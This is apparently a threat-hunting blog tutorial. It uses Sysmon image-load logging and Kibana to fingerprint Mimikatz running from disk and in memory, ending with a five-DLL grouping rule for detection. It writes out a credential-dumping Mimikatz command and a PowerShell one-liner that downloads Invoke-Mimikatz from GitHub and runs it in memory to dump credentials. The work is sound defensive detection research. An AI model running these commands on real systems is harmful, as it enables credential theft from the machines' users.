Download and save the Sysmon config in a preferred location of your choice as shown in Figure 1 below.

Figure 1. Saving custom Sysmon config.

Update your Sysmon rules configuration.
In order to do this, make sure you run cmd.exe as administrator, and use the configuration you just downloaded. Run the following command:

Sysmon.exe -c [Sysmon config xml file]

Then, confirm that your new config is running by typing the following:

sysmon.exe -c

(You will notice that the only things being logged will be images loaded by "PowerShell", as shown in figure 3 below.)

Figure 2. Running cmd.exe as an Administrator.

Figure 3. Updating your Sysmon rules configuration.

You should be able to open your Event Viewer and verify that the last event logged by Sysmon was Event ID 16, which means that your Sysmon config state changed. You should not get any other events after that unless you launch PowerShell. If you do, try to update your config one more time as shown in figure 3 above.

Figure 4. Checking Sysmon logs with the Event Viewer console.

Delete/Clean your Index

If you open your Kibana console and filter your view to show only Sysmon logs, you will see old records that were sent to your ELK server before you updated your Sysmon config. To be safe and make sure you don't have old image loads that might interfere with your results, I recommend deleting/clearing your index by running the following command as shown in figure 6 below:

curl -XDELETE 'localhost:9200/[name of your index]?pretty'

If you are using my Logstash configs, an index gets created as soon as data is passed to Elasticsearch.

Figure 5. Old Sysmon logs displayed on your Kibana console.

Figure 6. Clearing the contents of your main index. (Clearing logs)

Now, if you refresh your view (filtered to show only Sysmon logs again), you should not see anything unless you execute PowerShell.

Figure 7. No Sysmon logs in Elasticsearch yet.

Create a Visualization for "ImageLoaded" events

I do this so that I can group events and visualize data properly instead of using the Event Viewer.
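If you prefer hitting Elasticsearch directly instead of (or in addition to) a Kibana table, the same grouping is a plain terms aggregation. Below is a rough sketch of the request body; the field name event_data.ImageLoaded.keyword and the winlogbeat index are the ones used in this post's setup, but the body Kibana itself generates may differ slightly:

```python
import json

# Terms aggregation over the ImageLoaded field: top 200 values,
# ordered descending by count -- the same settings used for the
# Kibana data table in this post.
query = {
    "size": 0,  # only aggregation buckets, no raw hits
    "aggs": {
        "images_loaded": {
            "terms": {
                "field": "event_data.ImageLoaded.keyword",
                "size": 200,
                "order": {"_count": "desc"},
            }
        }
    },
}

# POST this body to your winlogbeat index's _search endpoint to get
# the same table of image paths and counts.
print(json.dumps(query, indent=2))
```

Each bucket in the response corresponds to one row of the data table (an image path and its count).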
To get started, do the following:

Click on "Visualize" on the left panel
Select "Data Table" as your visualization type

Figure 8. Creating a new visualization. Data Table type.

Select the index you want to use (in this case, the only one available is Winlogbeat)

Figure 9. Selecting the right index for the visualization.

As shown in figure 10 below:

Select the "Split Rows" bucket type
Select the aggregation type "Terms"
Select the data field for the visualization (event_data.ImageLoaded.keyword)
By default, data will be ordered "Descending". Set the number of records to show to "200" (we do this to make sure we show all the modules being loaded)

Figure 10. Creating visualization.

Click on "Options" and set the "Per Page" value to show 20 results per page. Remember, we set this visualization to show the top 200 records in figure 10 above, and now to show 20 records per page. If you end up with 10 pages full of records, then you might want to increase the number of records beyond 200, since you might not be showing all the results.

Figure 11. Setting visualization options.

Give a name to your new visualization and save it.

Figure 12. Saving visualization.

Figure 13. Saving visualization.

Creating a simple dashboard to add our visualization

To get started, do the following:

Click on "Dashboard" on the left panel. (Figure 14)
Click on "Add" in the options above your Kibana search bar. (Figure 15)

Figure 14. Creating a new dashboard.

Select the visualization we just created for images loaded. This will add the visualization to your dashboard.

Figure 15. Adding our new visualization.

Figure 16. Visualization added to our new dashboard.

Save your new dashboard: click on "Save" between the options "Add" and "Open", give your dashboard a name, and save it.

Figure 17. Saving new dashboard.

Figure 18. Saving new dashboard.

Testing/Logging Images loaded by PowerShell

As I stated before, if we want to detect anomalies, we first have to understand what normal looks like.
Therefore, in this section, we will find out what images get loaded when PowerShell is launched in order to start creating a baseline. To get started, launch PowerShell and close it.

Figure 19. Opening PowerShell.

Next, refresh your dashboard by clicking on the magnifying glass icon located to the right of the Kibana search bar. You will see that there are several images/modules that were loaded when PowerShell executed, as shown in figure 20 below.

Figure 20. Logging Images loaded by PowerShell.

If we go to our last page, page #4, we can see that there are 12 results on a 20-per-page setup. This means that we have 3 pages with 20 records and 1 with 12. Therefore, we can say that PowerShell loads 72 images when we open and close it.

Figure 21. Logging Images loaded by PowerShell.

Now, in order to verify that PowerShell loads 72 images most of the time, I opened and closed PowerShell 4 more times, as shown in figure 22 below.

Figure 22. Opening and closing PowerShell 4 times.

Once you refresh your dashboard again, you will see that we have the same images being loaded and that the count for each image increased by 4. We now see a count of 5 for every single unique image loaded: a total, again, of 72 unique images, each loaded 5 times. Up to this point, it is clear that PowerShell only loads 72 images when it starts, for its basic (default) functionality. We are now ready to test Mimikatz on disk.

Figure 23. Images loaded by PowerShell after being opened and closed 4 more times.

Figure 24. Images loaded by PowerShell after being opened and closed 4 more times.

Detecting Mimikatz on Disk

Download the latest Mimikatz trunk

Our first test will be running the Mimikatz binary available here, as shown in figure 25.

Figure 25. Downloading Mimikatz binaries.

Download and save your Mimikatz folder in a preferred location of your choice as shown in figure 26 below. I show you this because it is important that you remember the right path to the Mimikatz binary you will use for the first test.
We will need the path to update our Sysmon config and log the images loaded by the Mimikatz binary.

Figure 26. Downloading Mimikatz binaries.

Edit and Update your Sysmon config

Add another rule to the configuration we used earlier. Open the config with notepad++ and add another "Image" rule specifying the path to mimikatz.exe, as shown in figure 28.

Figure 27. Editing our Sysmon config.

Figure 28. Editing our Sysmon config.

Open cmd.exe as administrator and run the following command as shown in figure 29 below:

sysmon.exe -c [edited sysmon xml file]

Then, confirm that the changes were applied by running the following command:

sysmon.exe -c

(You will see that our new rule now shows up below our PowerShell one.)

Figure 29. Updating Sysmon rule configuration.

TIP: Extend the Time Range of your Dashboard

Remember that by default your dashboard is set to show the last 15 minutes of data stored in Elasticsearch. I always extend my time range to 15 or 30 minutes to make sure I still show logs that were captured more than 15 minutes ago (that is sometimes how long it takes me to do all the extra preparation, or I simply get distracted). It depends on how much time you take between each update or change you make to your config or strategy. You just want to make sure that your time range is right in order to capture all your results.

Figure 30. Extending the time range of your dashboard.

Running Mimikatz on Disk

Now that we have everything ready, let's first run PowerShell as Administrator. If you refresh your dashboard, the count of almost every single image/module will have increased by 1, as shown in figure 32 below.

Figure 31. Running PowerShell as Administrator.

Figure 32. PowerShell opened as Administrator.

Now, it is really important to make sure we do not load extra images that could be mixed in with the modules loaded by the Mimikatz binary. Before running Mimikatz, I wanted to show you what happens when you fat-finger a command in PowerShell.
Yes, it actually loads an image named diasymreader.dll, as shown in figure 34 below. Therefore, if you fat-finger the wrong arguments while executing Mimikatz, make sure you do not count diasymreader.dll as part of your results.

Figure 33. Testing wrong arguments in PowerShell.

One other important thing to mention is that PowerShell loads netutils.dll when the console closes. Since we are not closing our PowerShell console yet, you will still see netutils.dll with a count of 5 and not 6. We are using our high-integrity PowerShell process to run Mimikatz, so we can't close it yet.

Figure 34. Extra image loaded by PowerShell after executing wrong arguments.

It is time to test our Mimikatz binary. Change your directory to the one where the Mimikatz binary is stored (I used the x64 one). Launch the following commands and close your PowerShell console:

.\mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit

Figure 35. Running Mimikatz on disk.

Next, refresh your dashboard. You will see that our count for every single image on page 1 increased by 1. That means that Mimikatz also loads those images when it executes. This is an important first finding, because those first images might not be unique enough to be used to fingerprint Mimikatz.

Figure 36. Images loaded after executing Mimikatz on disk.

If you go to page #4, you will see that we start to see a few unique ones loaded by Mimikatz (remember that diasymreader.dll was not loaded by Mimikatz). Also, you can see that the image mimikatz.exe was loaded 4 times, by PowerShell of course.

Figure 37. Images loaded after executing Mimikatz on disk.

If you go to the next page, page #5, you can see the last unique images loaded by Mimikatz. This is good for this exercise, because we now have at least a basic understanding of the (so far) unique images being loaded by Mimikatz when executed on disk.

Figure 38. Images loaded after executing Mimikatz on disk.

What if I want to see images loaded by Mimikatz only?
What I like about using Kibana is that I can filter out or group data records with unique characteristics. Let's say you want to select only images loaded by mimikatz.exe. We will have to create an extra visualization and add it to our dashboard. You could also type a query in the Kibana search bar to accomplish that, but I prefer to have an extra visualization that I can interact with too (a good exercise).

As explained before, in order to create a visualization, click on "Visualize" on the left panel, and it will automatically take you to edit the only visualization that we have in our dashboard. Next, click on "New" to create a new visualization, as shown in figure 39 below.

Figure 39. Creating a new visualization.

Select Data Table for the visualization type and Winlogbeat for the index.

Figure 40. Creating a new visualization.

For this visualization, do the following:

Set the field to event_data.Image.keyword
Give it a name and save it

Figure 41. Creating a new visualization.

Figure 42. Saving the new visualization.

Click on "Dashboard" on the left console, and add the new visualization to your dashboard as shown in figure 43 below.

Figure 43. Adding visualization to dashboard.

You will see that we now have better numbers to show per image (PowerShell.exe & mimikatz.exe). You can see that PowerShell loaded 437 images overall. That makes sense: we know that it loads 72 images every time it opens and closes, and we used it 6 times, which gives us 432 images. We also made PowerShell load one extra image (diasymreader.dll) when I showed you what happens when you fat-finger a command, bringing us to 433. Add the 4 loads of the mimikatz.exe image that occurred when we used PowerShell to execute the Mimikatz binary, and we get our 437 images loaded, as shown in figure 44.

Figure 44. New visualization added to dashboard.
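The 437 reconciliation above is easy to double-check (note that the per-session count of 72 is what this particular lab observed, not a constant of PowerShell):

```python
baseline_per_session = 72  # default images per PowerShell open/close (observed)
sessions = 6               # times PowerShell was opened and closed
fat_finger_loads = 1       # diasymreader.dll from the mistyped command
mimikatz_loads = 4         # loads of the mimikatz.exe image itself

total = baseline_per_session * sessions + fat_finger_loads + mimikatz_loads
print(total)  # 437, matching the dashboard count
```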
Then, what you can do with this new visualization is click on the image "C:\Tools\mimikatz_trunk\x64\mimikatz.exe", and it will automatically create a filter to show only the images loaded by your selection, as shown in figure 46 below.

Figure 45. Images loaded only by PowerShell and Mimikatz.

Figure 46. Images loaded only by Mimikatz.

Figure 47. Images loaded only by Mimikatz.

You can also download all the results of the Images_Loaded visualization by clicking on the option "Formatted" below the data table results. That will allow you to export all the results in CSV format. Save the file and open it to highlight a few things.

Figure 48. Exporting results of images loaded in a CSV format.

Figure 49. Saving CSV file.

Open the file and highlight the unique images that were loaded by Mimikatz when it was run on disk. That will help you document your results. So far, we can consider the highlighted images to be our initial fingerprint for Mimikatz. That will change, of course, once you start collecting modules loaded by other programs and comparing results.

Figure 50. Result of images loaded after executing Mimikatz on disk.

Detecting In-memory Mimikatz

Delete/Clean your Index

Our next test will be launching Mimikatz reflectively in memory. To get started, delete/clear your index as shown in figure 51 below.

Figure 51. Deleting Index.

Refresh your dashboard to confirm that the index was deleted/cleared.

Figure 52. Empty Dashboard.

Getting ready to run Invoke-Mimikatz

Invoke-Mimikatz is not updated when Mimikatz is, though it can be (manually): one can swap out the encoded DLL elements (32-bit & 64-bit versions) with newer ones. Will Schroeder (@HarmJ0y) has information on updating the Mimikatz DLLs in Invoke-Mimikatz (it's not a very complicated process). The PowerShell Empire version of Invoke-Mimikatz is usually kept up to date. [Source]

Figure 53. Empire's latest Invoke-Mimikatz script.

Figure 54. Empire's latest Invoke-Mimikatz script.
As shown before in figure 22, when we were getting ready to run the Mimikatz binary, we want to make sure that we have a basic baseline of images/modules being loaded by PowerShell when it is opened and closed. Open and close PowerShell 4 times, as shown in figure 55 below.

Figure 55. Opening and closing PowerShell 4 times.

We can see the same 72 images being loaded 4 times. It should show a total of 288, but there might have been a delay before the logs made it to the server. I probably refreshed my dashboard too soon and did not capture the last netutils.dll load, which happens when PowerShell exits. Anyway, I think we have a good basic baseline before running Mimikatz reflectively in the same PowerShell process.

Figure 56. Images loaded by PowerShell before running Mimikatz.

Baselining how PowerShell will download Invoke-Mimikatz

The easiest way to test Invoke-Mimikatz is to go to its GitHub repo and download it before executing it in memory. We have to make sure that we understand what extra images PowerShell needs to load in order to perform network operations and download Invoke-Mimikatz as a string. We can use the same approach of opening and closing PowerShell, running only the command that pulls the script as a string from GitHub without executing Invoke-Mimikatz yet, as shown in figure 57 below.

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1')

Figure 57. Running commands to only download Invoke-Mimikatz.

Next, refresh your dashboard and, as you already know, you will see most of the unique image counts increased by one, as shown in figure 58 below.

Figure 58. Checking initial images loaded by PowerShell to download Invoke-Mimikatz from Github.

Now, if you go to page #4, you will start to see new unique images/modules. Those are images loaded by PowerShell to perform the "DownloadString" operation.
You can go to page #5 too, as shown in figure 60, and you will see more unique images. (You can expand your first visualization to see the long paths of a few images. The second visualization we added to the dashboard earlier will just move down.)

Figure 59. Unique Images loaded by PowerShell to download Invoke-Mimikatz from Github.

Figure 60. More unique images loaded by PowerShell to download Invoke-Mimikatz from Github.

Then, we can perform the same operation (downloading Invoke-Mimikatz from GitHub as a string) a few more times to make sure we have a strong fingerprint for that particular action, and avoid mixing it with images loaded when Mimikatz is executed in memory. I opened PowerShell three times, executed the same command to only download Invoke-Mimikatz as a string, and closed them all, as shown in figure 61.

Figure 61. Downloading Invoke-Mimikatz as a string three times.

Then, you will see that the counts for the initial images loaded by PowerShell increased by 3, but if you go to page #5, as shown in figure 63, you can see our "DownloadString" images loaded 4 times.

Figure 62. Images loaded by PowerShell after downloading Invoke-Mimikatz as a string 3 more times.

Figure 63. Images loaded by PowerShell after downloading Invoke-Mimikatz as a string 3 more times.

Running Mimikatz in Memory

To get started, run PowerShell as Administrator.

Figure 64. Running PowerShell as Administrator.

In order to download Invoke-Mimikatz as a string from GitHub and run it in memory, type the following commands:

IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds

Figure 65. Running Mimikatz in memory.

You will, of course, get the same results as when it was run on disk. Close your PowerShell console.

Figure 66. Results from running Mimikatz.
Analyzing In-Memory Mimikatz Results

After closing PowerShell, refresh your dashboard (make sure you have the right time range), and you will see that our initial default images loaded by PowerShell increased only by 1, and not by 2 as when we ran Mimikatz on disk. This is because the Mimikatz binary is run reflectively inside PowerShell, and several of the modules it needs are already loaded by PowerShell itself.

Figure 67. Images loaded by PowerShell when Mimikatz is executed reflectively in memory.

Next, if you go to page #5, you will see that the images loaded during the "DownloadString" operation increased by one (a count of 5 now, as expected). In addition, we can see one of the images that was also loaded while executing Mimikatz on disk:

C:\Windows\System32\WinSCard.dll

However, there are four new images that were loaded when Mimikatz was executed reflectively in memory (I will explain later why those get loaded when we run Invoke-Mimikatz):

C:\Windows\System32\whoami.exe
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\WMINet_Utils.dll
C:\Windows\System32\NapiNSP.dll
C:\Windows\System32\RpcRtRemote.dll

Figure 68. Images loaded by PowerShell when Mimikatz is executed reflectively in memory.

On page #6, we can also see a few new images that we did not see when Mimikatz ran on disk (I will explain later why those get loaded when we run Invoke-Mimikatz):

C:\Windows\System32\nlaapi.dll
C:\Windows\System32\ntdsapi.dll
C:\Windows\System32\pnrpnsp.dll
C:\Windows\System32\wbem\fastprox.dll
C:\Windows\System32\wbem\wbemprox.dll
C:\Windows\System32\wbem\wbemsvc.dll
C:\Windows\System32\wbem\wmiutils.dll
C:\Windows\System32\wbemcomn.dll
C:\Windows\System32\winrnr.dll

However, we can also see almost all of the rest of the images that were loaded when Mimikatz was executed on disk.
C:\Windows\System32\apphelp.dll
C:\Windows\System32\cryptdll.dll
C:\Windows\System32\hid.dll
C:\Windows\System32\logoncli.dll
C:\Windows\System32\netapi32.dll
C:\Windows\System32\samlib.dll
C:\Windows\System32\vaultcli.dll
C:\Windows\System32\wintrust.dll
C:\Windows\System32\wkscli.dll

I don't see the following modules (loaded by Mimikatz on disk) as unique ones anymore (count 1). This is because they are used to handle encryption and were part of the "DownloadString" baselining; we handled encrypted traffic with GitHub, so it makes sense. It is safe to say that these modules will be noisy (it does not mean that they do not get loaded while running Mimikatz in memory; it is just that PowerShell loads them first to handle the encrypted traffic):

C:\Windows\System32\bcrypt.dll
C:\Windows\System32\bcryptprimitives.dll
C:\Windows\System32\ncrypt.dll

Figure 69. Images loaded by PowerShell when Mimikatz is executed reflectively in memory.

You can reduce the width of the first visualization, and the second one that we added earlier should move back up next to the first one. This is just so that you can see the total number of images loaded by PowerShell at the end of this test.

Figure 70. Images loaded by PowerShell when Mimikatz is executed reflectively in memory.

In order to document your findings, export the results to a CSV file by clicking on the option "Formatted" below the "Images_Loaded" results, and save it to your computer as shown in figure 71.

Figure 71. Exporting results to a CSV file.

Comparing Results

As we can see in figure 72 below, it does not matter whether Mimikatz is executed on disk or in memory: it still loads the same extra modules it needs in order to work. Most of the modules that Mimikatz needs are already loaded by PowerShell, depending on what happens before running the script, but we can still see a few unique ones that could allow us to create a basic fingerprint for in-memory Mimikatz.
For example, if we take out the 3 modules used for encryption, we can use the other 10 to create a basic detection rule. We could hunt by grouping the following modules being loaded within a one- to four-second time bucket:

C:\Windows\System32\WinSCard.dll
C:\Windows\System32\apphelp.dll
C:\Windows\System32\cryptdll.dll
C:\Windows\System32\hid.dll
C:\Windows\System32\logoncli.dll
C:\Windows\System32\netapi32.dll
C:\Windows\System32\samlib.dll
C:\Windows\System32\vaultcli.dll
C:\Windows\System32\wintrust.dll
C:\Windows\System32\wkscli.dll

Figure 72. Comparing results on-disk and in-memory.

What about whoami.exe? We could add that to our basic in-memory Mimikatz fingerprint. If an adversary is using the exact Invoke-Mimikatz script from the Empire Project, it will reduce the number of false positives. The whoami part is defined in the main function of Invoke-Mimikatz, as you can see in figure 73 below. It is important to note that the Invoke-Mimikatz from PowerSploit does not have this command in the script.

Figure 73. Whoami utilized in Invoke-Mimikatz.

What about the modules loaded from the wbem directory and WMINet_Utils? All of that is part of Windows Management Instrumentation (WMI) technology, which provides access to monitor, command, and control any managed object through a common, unifying set of interfaces, regardless of the underlying instrumentation mechanism. WMI is an access mechanism. [Source]

But why do they get loaded when we run Mimikatz in memory? It is because of a simple command used in the Invoke-Mimikatz script to verify that the PowerShell architecture (32-bit/64-bit) matches the OS architecture. Most of the modules in question pointed to WMI activity, so I just opened the code and looked for any signs of WMI. Invoke-Mimikatz uses the cmdlet "Get-WmiObject" with the class "Win32_Processor" to find out information about the CPU and to get the "AddressWidth" value, which is used to verify the OS architecture, as shown in figure 74 below.

Figure 74. WMI in Invoke-Mimikatz.

So I tested that command on my computer and logged all the modules being loaded by PowerShell. I refreshed my dashboard and saw that all the modules in question were loaded while executing the following command:

get-wmiobject -class Win32_Processor

Figure 75. Executing get-wmiobject with class Win32_Processor to get information about the CPU.

Figure 76. Images loaded after using WMI.

I want to point out that the following modules can generate a lot of false positives, since they can be triggered by simple Office applications (x86/x64) and the use of Internet browsers such as Internet Explorer, as shown in figure 77 below:

C:\Windows\System32\nlaapi.dll
C:\Windows\System32\ntdsapi.dll

Figure 77. Images loaded after using WMI.

In addition, in my opinion, depending on how much WMI is used in your environment, it might be a good idea to start monitoring for at least:

C:\Windows\Microsoft.NET\Framework64\v2.0.50727\WMINet_Utils.dll

You can test that in your environment and see how noisy it gets. Log WMINet_Utils.dll loads for the .NET versions available in your gold image.
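In other words, the WMI call exists only so the script can compare the PowerShell process architecture against the OS architecture reported by Win32_Processor's AddressWidth, and pick the right embedded DLL. Purely for illustration, here is the process-side half of that check transplanted to Python (stdlib only; this is not the script's own code):

```python
import struct

def process_bitness() -> int:
    # Pointer size of the current process: 8 bytes in a 64-bit process,
    # 4 bytes in a 32-bit one -- the Python analogue of checking the
    # PowerShell process architecture.
    return struct.calcsize("P") * 8

# Invoke-Mimikatz compares this kind of value against Win32_Processor's
# AddressWidth (the OS architecture) to decide which embedded Mimikatz
# DLL (32-bit or 64-bit) to load reflectively.
print(process_bitness())  # 32 or 64
```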
On the other hand, most of the rest of the modules are loaded by several third-party and built-in applications, so they are too noisy and could cause a large number of false positives:

C:\Windows\System32\nlaapi.dll
C:\Windows\System32\ntdsapi.dll
C:\Windows\System32\pnrpnsp.dll
C:\Windows\System32\wbem\fastprox.dll
C:\Windows\System32\wbem\wbemprox.dll
C:\Windows\System32\wbem\wbemsvc.dll
C:\Windows\System32\wbem\wmiutils.dll
C:\Windows\System32\wbemcomn.dll
C:\Windows\System32\winrnr.dll

So far, our detection strategy is still to look for the following 10 modules:

C:\Windows\System32\WinSCard.dll
C:\Windows\System32\apphelp.dll
C:\Windows\System32\cryptdll.dll
C:\Windows\System32\hid.dll
C:\Windows\System32\logoncli.dll
C:\Windows\System32\netapi32.dll
C:\Windows\System32\samlib.dll
C:\Windows\System32\vaultcli.dll
C:\Windows\System32\wintrust.dll
C:\Windows\System32\wkscli.dll

How can we test our group of modules and tune it to reduce false positives? Before thinking about deploying a detection rule like this to your production Sysmon config, I highly recommend taking a gold image and logging every single module loaded by every process or application on the system. I tested this in my own environment at home.

Edit and Update your Sysmon config

Open the Sysmon configuration we used for our initial tests and set it to not exclude anything from Event ID 7 - Image Load (log everything), as shown in figure 79 below.

Figure 78. Editing current sysmon config.

Figure 79. Editing current sysmon config.

Open cmd.exe as administrator and run the following command as shown in figure 80 below:

sysmon.exe -c [edited sysmon xml file]

Then, confirm that the changes were applied by running the following command:

sysmon.exe -c

(You will see that everything for ImageLoad is now being logged.)

Figure 80. Updating Rule configurations.

Open several applications

We are now logging every single image loaded on our system on top of our Invoke-Mimikatz findings (DO NOT DELETE/CLEAR YOUR INDEX).
We can now open and close applications that a user would most likely use in an organization (depending on the type of job), as shown in figure 81.

Figure 81. Open applications on your testing machine.

Make sure that you also have the right time range assigned to your dashboard, since we are still using the logs we gathered from when we ran Invoke-Mimikatz. I set mine to "Last 1 hour", as shown in figure 83.

Figure 82. Adjusting Time Range.

Refresh your dashboard and you will see a lot of modules being loaded, as shown in figure 83 below. You can adjust your visualizations if you want to; that will allow you to see more than the 200 images being loaded on your box (that is how many records we set our Images_Loaded visualization to show).

Figure 83. Several images being loaded.

Hunt for the group of 10 modules

Next, with all that data, we can query for the 10 modules of our initial in-memory Mimikatz fingerprint, as shown in figures 84 and 85 below:

"WinSCard.dll", "apphelp.dll", "cryptdll.dll", "hid.dll", "logoncli.dll", "netapi32.dll", "samlib.dll", "vaultcli.dll", "wintrust.dll", "wkscli.dll"

You will see that 5 out of the 10 modules from our basic fingerprint are still unique (most of them are used to manage authentication security components and features of the system), as shown in figure 84 below:

C:\Windows\System32\WinSCard.dll
C:\Windows\System32\cryptdll.dll
C:\Windows\System32\hid.dll
C:\Windows\System32\samlib.dll
C:\Windows\System32\vaultcli.dll

You might be wondering: why not netapi32.dll? It was actually loaded 2 more times. That does not mean netapi32.dll is not a common binary needed for authentication support; however, since it seems to be used by a few other applications, I would rather filter that one out.

Figure 84. Querying for only In-memory Mimikatz fingerprint.
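The "group of modules inside a time bucket" rule described earlier can also be prototyped offline before being turned into a production query. Below is a minimal sketch; the event tuple shape and the four-second window are assumptions for illustration, and the module list is the 10-module fingerprint from this post:

```python
from collections import defaultdict

# The 10-module fingerprint from the on-disk/in-memory comparison.
FINGERPRINT = {
    "winscard.dll", "apphelp.dll", "cryptdll.dll", "hid.dll",
    "logoncli.dll", "netapi32.dll", "samlib.dll", "vaultcli.dll",
    "wintrust.dll", "wkscli.dll",
}
WINDOW_SECONDS = 4  # the "four seconds bucket" suggested earlier

def hunt(events):
    """events: iterable of (timestamp_seconds, process, image_path).
    Returns processes that loaded every fingerprint module within the window."""
    loads = defaultdict(list)  # process -> [(ts, module_name)]
    for ts, proc, image in events:
        name = image.rsplit("\\", 1)[-1].lower()
        if name in FINGERPRINT:
            loads[proc].append((ts, name))
    hits = []
    for proc, seen in loads.items():
        seen.sort()
        # slide a window over this process's fingerprint-module loads
        for i, (start, _) in enumerate(seen):
            bucket = {m for t, m in seen[i:] if t - start <= WINDOW_SECONDS}
            if bucket == FINGERPRINT:
                hits.append(proc)
                break
    return hits

# Synthetic demo: one process loads all 10 modules in under a second,
# another loads only apphelp.dll (a normal application would).
demo = [(1.0 + i * 0.1, "powershell.exe", "C:\\Windows\\System32\\" + m)
        for i, m in enumerate(sorted(FINGERPRINT))]
demo.append((2.0, "excel.exe", "C:\\Windows\\System32\\apphelp.dll"))
print(hunt(demo))  # ['powershell.exe']
```

The same logic maps naturally onto an aggregation over Sysmon Event ID 7 records once the grouping fields and window size are settled.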
If you want to know what modules/images are being loaded by a specific image on the EventID7_Images visualization, click on one of them and a filter will be created to show you only the images loaded related to your selection. For example, Excel apparently loads apphelp.dll and wintrust.dll from our list of 10, as shown in figure 85 below. Figure 85. What is loading what?

Or, vice versa, you can click on the loaded image and it will filter everything out to show you the images that loaded that specific module, as shown in figure 86. Figure 86. What is loading what?

What about other operations where authentication components are involved?

I cleaned/deleted my index and started paying attention to authentication operations such as logging onto web applications or onto my computer after rebooting it.

Logging onto the Kibana web interface

I opened IE, and the first two modules out of the 10 that got loaded were wintrust.dll and apphelp.dll. Then, I browsed to my ELK's IP address and got a prompt to enter my credentials. I noticed that for IE to do all this, it also needed to load 5 out of the 10 modules used by Mimikatz, as shown in figure 87 below. 3 of those 5 are still part of the ones required for authentication support:

samlib.dll
WinSCard.dll
vaultcli.dll

Figure 87. Images loaded by IE while authenticating to Kibana.

Logging onto my system after rebooting it

The processes shown in figure 88 below are the first processes that get started when a system boots up. (The ones with the grayed icons are processes that have already exited.) Figure 88. Images loaded by the first processes that get started by your system when it boots up.

So what happens when we look for the 5 modules that are so far considered part of the combination with the fewest false positives against the processes shown in figure 88?
"WinSCard.dll", "cryptdll.dll", "hid.dll", "samlib.dll", "vaultcli.dll"

As you can see below in figure 89, there were hits for all of them, but only from processes involved in authentication. The one with the most hits was "LogonUI.exe". Figure 89. "Credential Providers" modules used by a few processes.

When conducting research on that particular process (LogonUI.exe) for a training class I put together for some colleagues, I found out the following:

"Whenever a user hits Ctrl-Alt-Del, winlogon.exe switches to another desktop and launches a special program, logonui.exe, to interact with the user. The user may be logging on initially, (un)locking the desktop, changing her password or some other task, but the user is interacting with logonui.exe on a special desktop, not winlogon.exe on the default desktop. When authenticating, logonui.exe loads DLLs called "credential providers" which can handle the password, smart card or, with a third-party provider, biometric information, to authenticate against the local SAM database, Active Directory, or some other third-party authentication service." [Source]

Therefore, all 5 of those modules being loaded together by other processes handling credentials would make sense. We could use this knowledge to filter out a few processes where one would normally enter credentials to authenticate to a certain service or application. For example, processes such as Chrome, IE, or even Outlook (known for asking for your password 50 times a day) would load those modules. SSO via your browser would also load most of those images.

Final Thoughts

Even though this is just part I of detecting In-memory Mimikatz, we are already coming up with a basic fingerprint that will allow us to reduce the number of false positives when hunting for this tool when it is executed in memory.
Based on the number of tests performed, a basic fingerprint for In-memory Mimikatz from a modules perspective could be:

C:\Windows\System32\WinSCard.dll
C:\Windows\System32\cryptdll.dll
C:\Windows\System32\hid.dll
C:\Windows\System32\samlib.dll
C:\Windows\System32\vaultcli.dll

If you can afford (enough space) to log one more image being loaded in your environment, I think it would be a good idea to monitor for the following module. I only saw it being loaded by PowerShell after launching several other applications and logging the modules being loaded.

C:\Windows\Microsoft.NET\Framework64\[Versions available]\WMINet_Utils.dll

Hunting technique recommended: Grouping [Source]

"Grouping consists of taking a set of multiple unique artifacts and identifying when multiple of them appear together based on certain criteria. The major difference between grouping and clustering is that in grouping your input is an explicit set of items that are each already of interest. Discovered groups within these items of interest may potentially represent a tool or a TTP that an attacker might be using. An important aspect of using this technique consists of determining the specific criteria used to group the items, such as events having occurred during a specific time window. This technique works best when you are hunting for multiple, related instances of unique artifacts, such as the case of isolating specific reconnaissance commands that were executed within a specific timeframe."

Therefore, the idea is to group the 5 images/modules mentioned above being loaded within a 1-5 second time bucket, while possibly filtering out known processes performing that type of behavior. Only a few processes, as far as I can tell, load all 5 modules (not just one, two, three, or four) during authentication operations. In addition, NONE of the other processes launched during testing loaded the 5 modules together with the WMINet_Utils.dll one.
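The grouping technique can be made concrete with a minimal Python sketch, not part of the original post: flag any process that loads all 5 fingerprint modules within a 5-second window, optionally skipping a known-good allowlist (e.g. LogonUI.exe). The event tuples and process names below are hypothetical; a real hunt would pull these records from your SIEM.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# The reduced 5-module fingerprint discussed above.
GROUP = {"WinSCard.dll", "cryptdll.dll", "hid.dll", "samlib.dll", "vaultcli.dll"}
WINDOW = timedelta(seconds=5)

def suspicious_processes(events, known_good=frozenset()):
    """Flag processes that load ALL 5 modules within the time window.

    `events` are (timestamp, process_image, module_name) tuples, a simplified
    stand-in for Sysmon Event ID 7 records; real field names will differ.
    """
    loads = defaultdict(list)  # process -> time-ordered [(time, module)]
    for ts, proc, module in sorted(events):
        if module in GROUP and proc not in known_good:
            loads[proc].append((ts, module))

    flagged = set()
    for proc, seq in loads.items():
        # Slide a window starting at each load and collect what falls inside.
        for i, (start, _) in enumerate(seq):
            seen = {m for t, m in seq[i:] if t - start <= WINDOW}
            if seen == GROUP:
                flagged.add(proc)
                break
    return flagged

t0 = datetime(2017, 3, 20, 12, 0, 0)
events = [
    (t0, "powershell.exe", "WinSCard.dll"),
    (t0 + timedelta(seconds=1), "powershell.exe", "cryptdll.dll"),
    (t0 + timedelta(seconds=1), "powershell.exe", "hid.dll"),
    (t0 + timedelta(seconds=2), "powershell.exe", "samlib.dll"),
    (t0 + timedelta(seconds=3), "powershell.exe", "vaultcli.dll"),
    (t0, "iexplore.exe", "vaultcli.dll"),  # partial match only, not flagged
]
print(suspicious_processes(events))  # → {'powershell.exe'}
```

Requiring the full set within the window, rather than any single module, is exactly what keeps processes like iexplore.exe (which load only a subset) out of the alert.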
Therefore, I see the value in grouping them together and seeing what processes load all of them within a short period of time (seconds). Once again, this is just part I, and in future posts I will combine this approach with other chains of events in order to reduce the number of false positives while hunting for In-Memory Mimikatz.

Let me know how it works out for you when logging those specific modules in your organization. I would highly recommend taking this approach on a gold image first, then logging one module at a time to test which ones might cause false positives. I would love to hear your results! Feedback is greatly appreciated! Thank you.

Update (03/21/2017)

